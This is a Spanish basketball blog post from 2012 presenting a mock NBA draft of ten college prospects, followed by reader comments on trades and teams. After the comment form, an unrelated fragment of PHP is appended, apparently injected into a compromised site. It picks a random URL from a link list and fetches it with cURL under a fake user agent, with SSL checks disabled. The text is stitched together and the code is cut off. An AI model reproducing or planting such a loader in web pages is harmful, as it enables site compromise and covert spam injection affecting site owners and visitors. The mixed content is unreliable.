Mock Draft 1.0: TOP-10

10 de April de 2012 por melo15

Os presento un análisis de los 10 mejores jugadores que se presentan a este draft. Espero que os guste.

1.- Anthony Davis

Universidad: Kentucky
Altura y Peso: 2’08m y 100Kg
Posición: Ala-pívot
Estadísticas: 14p, 10r y 5t
NBA Comparación: Marcus Camby

Es difícil analizar al próximo número 1 del draft. Davis es un ala-pívot con buena altura pero al que le faltan algunos kilos. Por otra parte es un jugador bastante rápido y con una excelente envergadura. A pesar de su peso es un gran rebotador y un buen anotador en la pintura, y además tiene un efectivo tiro de 4 metros. Todo esto hace que tenga un excelente porcentaje  en tiros de campo: 65%.

Defensivamente Davis es aun mejor. Tiene buenos fundamentos, brazos muy largos y es rápido. Ha sido el mejor taponador de la NCAA y es un buen defensor perimetral (1’4 robos).

Conclusión: Davis tiene potencial para ser un all-star pero para eso debe mejorar su juego ofensivo y añadir algunos kilos.

2.- Thomas Robinson

Universidad: Kansas
Altura y Peso: 2’08m y 1’08Kg
Posición: Ala-pívot
Estadísticas: 18p, 12r y 1t
NBA Comparación: Kris Humphries

Thomas ha sido la gran revelación de esta temporada. Después de dos temporadas a  la sombra de los hermanos Morris, Robinson ha explotado mostrando todas sus habilidades, y hasta dónde puede llegar.  Con una altura y un peso ideales para el puesto, físicamente es de otro mundo. Se trata de un jugador que impone en ambos lados de la cancha. Defensivamente es toda una presencia en la zona y ofensivamente es un jugador que basa su juego en situaciones en las que  solo ha de recibir y anotar ya que le cuesta jugar en el poste y tampoco tiene un gran tiro de media distancia. El mejor rebotador del draft, tanto defensiva como ofensivamente.

Conclusión: Thomas ha demostrado que lo tiene todo para ser una estrella pero tendrá que mejorar su tiro y su juego en el poste.  Personalmente tengo dudas acerca de este jugador, ya que si os acordáis Wesley Johnson también dominó la NCAA después de dos años mediocres y después no ha sido nadie en la NBA.

3.- Michael Kidd-Gilchrist

Universidad: Kentucky
Altura y Peso: 2’01m y 105Kg
Posición: Alero
Estadísticas: 12p, 7’6r, 1ro y 1t
NBA Comparación: Gerald Wallace

Mi jugador preferido dentro de este draft.  Michael es ante todo un jugador muy trabajador, con una gran ética de trabajo y una gran pasión por este deporte.

Centrándonos es su juego, las comparaciones con Wallace no son infundadas. Al igual que el jugador de los Nets,  Michel es un gran defensor, capaz de defender tanto a bases como a ala-pívots y un gran reboteador para su posición. Pero también al igual que el jugador de los Nets, Michael es un pobre tirador de 3, aunque buen penetrador y con un aceptable tiro de media distancia. De todas manera, su ética de trabajo le hará mejorar en estos aspectos.

Conclusión: Si se presenta al draft es más que probable que salga en los 5 primeros puestos, y si sigue mejorando, podría convertirse en un all-star.

4.- Harrison Barnes

Universidad: North Carolina
Altura y Peso: 2’03m y 95Kg
Posición: Alero
Estadísticas: 17p, 5’6r y 1ro
NBA Comparación: Luol Deng

A pesar de que lo comparan con Deng su techo es bastante más alto y es que  Barnes tiene una buena altura y es un buen atleta. Tiene un tiro de larga distancia eficaz y es  más que capaz de llegar al aro y acabar con un mate. Pero su especialidad es el tiro de media distancia el cual usa a menudo (abusando en ocasiones) y con buena eficacia.

Defensivamente se trata de un jugador excepcional. Tiene una gran combinación de altura, brazos largos, agilidad e inteligencia que le hacen ser un gran defensor perimetral, aunque debería ganar algunos kilos de cara a la NBA.  También hay que mencionar su gran BB IQ.

Conclusión:  Barnes es un jugador con potencial para convertirse en una semi-estrella, tipo Danny Granger, pero también surgen algunas dudas acerca de su capacidad de liderazgo.

5.- Bradley Beal

Universidad: Florida
Altura y Peso: 1’92m y 89Kg
Posición: Escolta
Estadísticas: 15p, 7r y 1’5ro
NBA Comparación: Eric Gordon

El jugador de los Gators es, físicamente, un clon de Eric Gordon. Ambos son bajos para la posición de escolta, pero muy explosivos y rápidos.

Ofensivamente Beal tiene muchos recursos: Puede penetrar con fluidez, tirar de media distancia o levantarse desde mas allá de la línea de tres. Precisamente el tiro de 3 es su gran especialidad y la ejecuta de todas las maneras (catch and shot, tras dribling o saliendo de cortinas).  Además  Beal es un jugador sin una pizca de egoísmo, que  no suele forzar los tiros y con un gran BB IQ.

Defensivamente, es un jugador que cumple. No es un gran defensor, pero tampoco le cuesta muchos puntos a su equipo. Es un buen reboteador defensivo.

Conclusión: Beal tiene potencial para ser un buen segunda espada, pero no creo que llegue a estrella ya que su altura le puede condicionar bastante.

6.- Andre Drummond

Universidad: Connecticut
Altura y Peso: 2’10m y 125Kg
Posicion: Pívot
Estadísticas:  10p, 7’6r y 3t
NBA Comparación: Amaré  Stoudmire

A día de hoy Andre es un jugador que no está preparado para dar el salto a la NBA. A pesar de su gran altura, envergadura y explosividad, sus movimientos ofensivos son poco pulidos y basa su juego de ataque en recibir y machacar (Alley-Oops, rebotes ofensivos, contragolpes…) ya que no tiene un tiro de media distancia eficaz.

Es en el aspecto defenisvo donde más potencial tiene Drummond. Su combinación de altura y fuerza le convierten en un gran intimidador y taponeador y es también eficaz defendiendo pick and rolls.

Conclusión:  Drummond es un jugador con unas condiciones físicas envidiables pero al que le iría mejor una año más en Connecticut.

7.- Jared Sullinger

Universidad: Ohio State
Altura y peso: 2’06m y 118Kg
Posición: Ala-pívot
Estadísticas: 17p, 9r y 1t
NBA Comparación: Al Jefferson

La principal característica de “Sully” es su extremada fuerza, pero a pesar de esto no es un gran atleta, ni tiene la altura ideal para el puesto.

Ofensivamente, su juego en el poste es sencillamente sensacional. Tiene una gran cantidad de recursos y usa su fuerza para ganar la posición en la pintura. También  posee un tiro de media distancia bastante efectivo, y está empezando a probar de tres puntos. En lo que mas se destaca Sullinger es rebotando, de los mejores de la NCAA.

Defensivamente es un  jugador limitado y podría tener problemas en la NBA. No es suficiente rápido para defender ala-pívots y es demasiado bajo para defender a pívots.

Conclusión:  Jared ha demostrado que puede mejorar en diversas facetas de su juego lo suficiente como para ocultar sus defectos. De cara a la NBA, debería orientar más su juego al perímetro.

8.- Cody Zeller

Universidad: Indiana
Altura y Peso: 2,11m y 104Kg
Posición: Pívot
Estadísticas: 15p, 6r, 1t
NBA Comparación: Chris Kaman

El hermano pequeño de los Zeller ha sorprendido a la mayoría de ojeadores de la NBA, liderando a los Hoosiers  a los Sweet Sixteen.  Ofensivamente, Cody ha sorprendido por su efectividad en el poste bajo, donde su combinación de recursos, altura y rapidez lo hacen prácticamente indefendible. A pesar de que prueba poco de media distancia, tiene una  buena mecánica de tiro y podría y debería incorporarlo a su arsenal es un futuro cercano.

Defensivamente es un buen jugador gracias a su altura y rapidez. De cara a la NBA tendría que sumar algunos kilos para pegarse con tipos más fuettes. No es un gran reboteador.

Conclusión:  Zeller puede convertirse en un buen pívot titular pero deberá incorporar un tiro de media distancia y sumar algunos kilos.

9.- Perry Jones III

Universidad: Baylor
Altura y Peso: 2’11m y 107Kg
Posición: Ala-pívot
Estadísticas: 13p, 7r
NBA Comparación: Anthony Randolph

Gran combinación de altura y capacidad atlética. El jugador de Baylor es bastante productivo en el poste bajo gracias a su altura, aunque de cara a la NBA debería sumar unos cuantos kilos más. No destaca tirando de media distancia y menos aún de tres puntos. Las situaciones en las que se encuentra más cómodo son las de recibir y anotar: Pick & Rolls, Alley-Oops… También es bueno atacando al aro gracias a su manejo de balón.

Defensivamente posee las condiciones para ser un buen defensor, pero no lo ha demostrado dando la sensación de que no estar del todo concentrado.  Tendría que mejorar como reboteador.

Conclusión: Perry Jones tiene las características físicas y técnicas como para ser un Top-5 en este draft pero parece que juega sin ganas. Es un jugador que puede encumbrar a un GM o hacer que lo echen.

10.- Jeremy Lamb

Universidad: Connecticut
Altura y Peso:1’96m y 84Kg
Posición: Escolta
Estadísticas:  18p, 5r y 1ro
NBA Comparación: Ray Allen

A pesar de la mala temporada de los Huskies, Lamb ha conseguido llevar a cabo un buen año en el plano individual que le catapultará seguramente a puestos de lottery pick.

Lamb es un jugador muy completo que puede ayudar en casi todos los aspectos del juego. Buen anotador, especialmente de media distancia (45%). No ataca mucho el aro pero cuando lo hace define de manera excelente (80%). Se trata también de un sólido reboteador tanto ofensiva como defensivamente. Se trata de un jugador con mucho potencial defensivo. Tiene una combinación de altura y  brazos largos que le convierten en un gran defensor y un muy buen ladrón. Tendrá que sumar unos cuantos kilos para no sufrir en la NBA.

Conclusion: Si sigue mejorando podría convertirse en futuro all-star. También es un jugador al que no le tiembla el pulso a la hora de atacar y es un buen defensor, con potencial para ser aún mejor.

Comenta

21 comentarios a esta entrada

  1. Txusma dice:
    #1

    Buen repaso. Ahora hay q estar atentos si todos los jugadores se presentan o no al draft. Por ejemplo, Cody Zeller juraría que se quedará un año más en la universidad.

      Citar

  2. Heineken dice:
    #2

    Gran articulo. Veremos cual de todos es el pobrecillo que cae en los Bobcats xD

      Citar

  3. TheDeerHunter dice:
    #3

    Ojito al debut de Melo15 como redactor de TJNBA. Gran trabajo. Enhorabuena.

      Citar

  4. Sancho88 dice:
    #4

    Grandioso análisis de los jugadores. Te has currado unos perfiles muy buenos. Por hacer esto hay gente que cobra muchísima pasta, lo sabías no? Echando muchas horas, esto podría considerarse un buen trabajo de scouting. Muy buen artículo para estrenarte, melo, me ha encantado. Enhorabuena!!

      Citar

  5. Ru dice:
    #5

    Sip,Cody Zeller (y Watford) regresan a los Hoosiers según el medio RealGM -hoy mismo ha salido-.Ya los mocks lo ponen en las primeras elecciones de 2013.

    PD.Muhammad,apuntaos ese nombre pal futuro.

      Citar

  6. Ru dice:
    #6

    Y felicidades melo15,of course,que se me olvidaba.

      Citar

  7. Pablo dice:
    #7

    Qué significa BBIQ?

      Citar

  8. Cocinitas dice:
    #8

    Espectacular analisis de Melo!!! Ojito a los Cavs que si quedan 4º por abajo tienen muchas de ser el pick 1 y un equipo con Irving, Thompson y Anthony Davis seria un equipazo de futuro.

      Citar

  9. Denise dice:
    #9

    Una pregunta para Melo o para el que se conozca a estos 10 jugadores y quiera contestar.

    ¿Cambiariais a un jugador franquicia o escudero por algun rookie de éstos mas un par de jugadores de contrato medio-alto para cuadrar salarios?

    Por ejemplo….ya que has comparado a Drummond con Amare…imaginemos que los Bobcats se hacen con Drummond…¿aceptarias un Tyrus Thomas + Henderson + Drummond por Amare?

      Citar

  10. simon dice:
    #10

    Buen trabajo melo. Por cierto opinais como yo que por el bien de estos chavales deberian prohibir a los bobcats elegir a ninguno de estos jugadores???

      Citar

  11. Jack77 dice:
    #11

    Denise: mmond con Amare…imaginemos que los Bobcats se hacen con Drummond…¿aceptarias un Tyrus Thomas

    Denise, yo sin duda dependiendo de que Top 10 me ofreces. En el ejemplo que tu has puesto, suponiendo que se hiciese el próximo verano, seria totalmente un acierto por parte de los de NY, me explico: Melo ha demostrado saber jugar como líder, porque lo es, y Melo es mejor sin Amare. Por eso, cambiando a Amare, los Knicks conseguirían a un escolta como Henderson para suplir la marcha de Fields, aunque no se si se irá ya que los NYK tienen los derechos Bird sobre él, y ganarían un Tyrus Thomas que puede cumplir junto a Chandler a nivel defensivo, cosa que gusta a Woodson. Además, Drummond sería el reserva de la zona de los Knicks, que seguramente con Jeffries serian los reservas cumplidores. Por otra parte, se quitan a las rodillas de Amare de cuestan 20 kilos cada año. Mi teoría es que los Bobcats la cagarían aún más. (No digo que Amare sea un mal jugador, al 100% tiene nivel all-star)

      Citar

  12. Jack77 dice:
    #12

    Denise:
    Una pregunta para Melo o para el que se conozca a estos 10 jugadores y quiera contestar.
    ¿Cambiariais a un jugador franquicia o escudero por algun rookie de éstos mas un par de jugadores de contrato medio-alto para cuadrar salarios?
    Por ejemplo….ya que has comparado a Drummond con Amare…imaginemos que los Bobcats se hacen con Drummond…¿aceptarias un Tyrus Thomas + Henderson+ Drummond por Amare?

    Yo como seguidor de los Knicks y declarado knickerbocker, aceptaría con los ojos cerrados lo de Amare. Lo sentiría mucho por él porque fue Amare(y Felton, Gallinari, Wilson Chandler,..) quien me devolvió la ilusión de los Knicks, pero yo miro por lo que creo que sería más beneficioso por los Knicks.

      Citar

  13. Sancho88 dice:
    #13

    simon:
    Buen trabajo melo. Por cierto opinais como yo que por el bien de estos chavales deberian prohibir a los bobcats elegir a ninguno de estos jugadores???

    Hombre lo de los Bobcats no va a ninguna parte. Incluso ya se ha hablado de que MJ estaría dispuesto a vender el equipo. Las gradas vacías, el pabellón desierto, una ciudad irrelevante en el panorama NBA desde que se fueron los Hornets, un equipo en el que solo se puede salvar a Kemba Walker, Biyombo y Mullens, que son los más jovencitos, más Augustin y Henderson como suplentes para equipos de segunda línea… es una pena que existan y Seattle siga sin equipo.

      Citar

  14. Denise dice:
    #14

    Lo que he querido dar a entender con lo de Drummond , Amare y los Bobcats, que es un simple EJEMPLO, es si estos jugadores son tan buenos que merecen la pena desprenderte de un jugador franquicia o escuderos para conseguir uno de éstos mas los 2-3 jugadores de nivel medio-alto que te den para cuadrar salarios.
    O hacer cosas similares a las de los Thunder (Sonics) que vendieron a Ray Allen a cambio de unos cuantos de Celtics y sus jugadores de Draft, (creo que era Jeff Green)
    Dicho de otra forma, quería saber si este Draft tiene calidad o no.

      Citar

  15. Esteban dice:
    #15

    tengo la ilusion que los nets saquen el numero 1, seria una suerte similar a la de duncan para davis

    mira que diferencia jugar en los bobcats, incluso en los wizars o en el propio detroit, cavs, con estos planteles los primeros 3 años de tu carrera (hasta q terminen de reconstruirse al menos)

    q jugar en los brooklin nets, davis haria reconsiderar seriamente a deron renovar, y un equipo con deron, wallace, lopez y davis, mas el espacio que tienen los nets, y jugadores como brooks, farmar y morrow

    vaya diferencia!

    otro destino apetecible para davis, de los que son posibles seria New orleans, que ya tiene jovenes buenos como gordon, vazquez, aminu, jack, ayon, y tiene ademas dos primeras rondas, para que la reconstruccion sea casi automatica este año

    y por ultimo, donde seria un GOLAZO de MESSI, en los wolves, q pena que no tengan su ronda, pensar que los clippers habrian sacado el uno el año pasado siendo el octavo peor (traspasaron su ronda a los cavs), y en la caida libre de los wolves tal vez podrian haber llegado a esa posicion

      Citar

  16. olarte dice:
    #16

    y el que decian que era de los mejores como es Austin Rivers que pasa, no se presenta o no se merece un top 10?

      Citar

  17. simon dice:
    #17

    olarte: y el que decian que era de los mejores como es Austin Rivers que pasa, no se presenta o no se merece un top 10?

    No ha cumplido las expectativas esta temporada. Creo que finalmente si que se presenta pero no estoy seguro.

      Citar

  18. melo15 dice:
    #18

    Rivers ha jugado a un nivel medio para un freshman, se esperaba mas de el? Si pero tampoco lo ha hecho tan mal. Ahora la cagada ha sido presentarse al Draft, porque el chaval no esta preparado, demasiadas lagunas, al igual que Drummond, pero como este es pivot…
    Denise, el cambio que has propuesto es muy arriesgado, te puede salir muy bien, o te puedes pegar un ostion brutal, demasiado riesgo, ademas surgen muchas dudas acerca de la etica de trabajo de Drummond, y su pasion por este deporte.

      Citar

  19. Txusma dice:
    #19

    Pablo:
    Qué significa BBIQ?

    Viene a ser Inteligencia Baloncestística

      Citar

  20. arivas dice:
    #20

    Solo he visto algunos videos de estos chicos, pero Drummond yo creo que va a ir mas arriba. Es cierto que ha decepcionado y como bien ha explicado Melo parece que le vendria bien otro añito en la uni antes de dar el salto, pero ojo que a principios de año era pick 1 en casi todos los mocks, tiene unas condiciones fisicas brutales (algo que siempre hace subir posiciones)
    Ahora esta muy reciente el MM y esta claro que jugadores como Robinson o MkG, se han marcado muy buenos partidos y han subido como la espuma. ( y otros han bajado como el propio Drummond o Lamb por su pronta eliminacion) pero queda mucho todavia por ver.
    Por cierto estos chicos ya no vuelven a jugar hasta el curso que viene? no tienen ninguna otra competicion en abril-mayo?

      Citar

  21. melo15 dice:
    #21

    No ninguna competicion, ahora toca los campus pre-draft y estas cosas.
    Arivas, esa es la cosa que mas miedo me da de Drummond, que se quede en portento fisico.
    Bueno, que jugadores os gustan mas para vuestros equipos? Sancho, donde estas?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>